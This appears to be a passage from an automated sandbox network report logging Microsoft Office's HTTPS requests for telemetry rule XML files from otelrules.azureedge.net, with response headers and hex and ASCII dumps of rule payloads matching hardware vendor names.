                                                          2024-12-02 16:56:12 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          31192.168.2.44978713.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:12 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:12 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:12 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 486
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                          ETag: "0x8DC582B9018290B"
                                                          x-ms-request-id: 1383167b-401e-008c-1f3c-4486c2000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165612Z-174f784596886s2bhC1EWR743w00000014u00000000062na
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:12 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          32192.168.2.44978613.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:12 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:12 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:12 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 486
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                          ETag: "0x8DC582BB344914B"
                                                          x-ms-request-id: 79414491-c01e-0014-1360-43a6a3000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165612Z-174f7845968px8v7hC1EWR08ng0000001510000000005mvt
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:12 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          33192.168.2.44978913.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:12 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:12 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:12 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 407
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                          ETag: "0x8DC582B9698189B"
                                                          x-ms-request-id: ff98645e-b01e-0001-1091-3f46e2000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165612Z-174f78459688l8rvhC1EWRtzr00000000h5g00000000x597
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:12 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          34192.168.2.44979213.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:14 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:15 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:14 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 477
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                          ETag: "0x8DC582BB8CEAC16"
                                                          x-ms-request-id: fb105ca9-d01e-002b-5b00-4425fb000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165614Z-174f7845968xlwnmhC1EWR0sv800000014dg00000000vk6q
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:15 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          35192.168.2.44979313.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:14 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:15 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:14 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 464
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                          ETag: "0x8DC582B97FB6C3C"
                                                          x-ms-request-id: e1f54f45-601e-0097-18a1-42f33a000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165614Z-174f7845968qj8jrhC1EWRh41s00000014k000000000snve
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:15 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          36192.168.2.44979413.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:14 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:15 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:14 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 494
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                          ETag: "0x8DC582BB7010D66"
                                                          x-ms-request-id: 5e69cd2e-d01e-002b-6bff-4125fb000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165614Z-174f7845968px8v7hC1EWR08ng00000014zg00000000by0x
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:15 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          37192.168.2.44979113.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:14 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:15 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:14 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 415
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                          ETag: "0x8DC582BA41997E3"
                                                          x-ms-request-id: 4b7a7cb4-201e-000c-0405-4179c4000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165614Z-174f7845968psccphC1EWRuz9s00000015100000000056ac
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:15 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          38192.168.2.44979613.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:16 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:17 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:17 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 419
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                          ETag: "0x8DC582B9748630E"
                                                          x-ms-request-id: e044a7be-f01e-003c-0c76-438cf0000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165617Z-174f7845968swgbqhC1EWRmnb400000014yg0000000036ft
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:17 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          39192.168.2.44979713.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:16 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:17 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:17 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 472
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                          ETag: "0x8DC582B9DACDF62"
                                                          x-ms-request-id: 264c510b-001e-000b-0eb2-4215a7000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165617Z-174f7845968xlwnmhC1EWR0sv800000014g000000000mefx
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:17 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          40192.168.2.44979813.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:16 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:17 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:17 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 404
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                          ETag: "0x8DC582B9E8EE0F3"
                                                          x-ms-request-id: 3f7caad5-701e-006f-6962-43afc4000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165617Z-174f7845968frfdmhC1EWRxxbw00000014rg00000000geew
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:17 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          41192.168.2.44979913.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:16 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:17 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:17 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 468
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                          ETag: "0x8DC582B9C8E04C8"
                                                          x-ms-request-id: f5817373-b01e-003e-3591-3f8e41000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165617Z-174f7845968qj8jrhC1EWRh41s00000014mg00000000k3x9
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
